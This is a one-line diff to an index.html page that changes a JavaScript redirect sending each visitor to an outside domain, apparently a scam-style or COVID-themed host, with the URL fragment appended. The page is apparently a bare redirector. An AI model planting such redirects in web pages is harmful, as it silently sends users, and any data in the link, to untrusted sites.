--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script>document.location.href = 'http://hicovid19.online/'+window.location.href.split('#')[1];</script>
+<script>document.location.href = 'http://hacy.online/'+window.location.href.split('#')[1];</script>
